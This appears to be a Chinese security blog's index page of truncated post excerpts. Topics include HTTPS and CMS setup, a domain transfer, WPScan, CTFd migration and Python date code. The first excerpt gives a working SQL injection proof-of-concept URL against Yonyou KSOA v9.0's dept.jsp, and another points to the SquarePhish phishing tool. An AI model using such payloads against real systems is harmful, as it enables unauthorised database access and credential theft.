用友时空 KSOA v9.0 SQL注入
PoC http://***/common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'12345'))-- &nbs...
PoC http://***/common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'12345'))-- &nbs...
1、开启FULL模式 2、申请证书,记录pem、key 3、写入BT面板,开启强制https 4、wordpress中配置https://域名
Godaddy的ORG太特么贵了,今天有时间作转移,找了半天没找到位置,具体转移位置如下 : 记得一直往下拉: 看到该处,选择“Transfer to Another Registrar”即可: OK:
https://github.com/wpscanteam/wpscan 1、安装需求: ruby升级到 2.7: yum -y install ruby 安装默认版本为2.5 安装rvm curl -sSL ...
地址:https://github.com/secureworks/squarephish 文档: usage: squish.py [-h] {email,server} ... SquarePhish -- v0.1.0 optiona...
帝国cms默认调用子栏目: [e:loop={"select classid,classname from {$dbtbpre}enewsclass where bclassid=0 order by myorder,classid asc...
今天在https://cn-sec.com/archives/2593491.html 看到这个工具,一直以来想找个方便的web日志分析工具,遂测试了下: 1.下载: https://github.com/kitabisa/teler/ 2...
由于服务器即将过去,从宝塔1将ctfd迁移到宝塔2 ,打包了整个ctfd目录,发现并没有什么卵用。 find了下文件,发现真正的数据库ctfd.db在宝塔的垃圾桶目录下,没搞懂是什么机制 所以在宝塔下迁移的时候,需要注意: 1、数据库在/w...
CTFd 直接将sqlite通过Navicat转为mysql提示错误: [SQL] Query main start [ERR] 1064 – You have an error in your SQL syntax; chec...
记录下 from datetime import datetime, date from dateutil.relativedelta import relativedelta # 获取当前日期 now = datetime.now() #...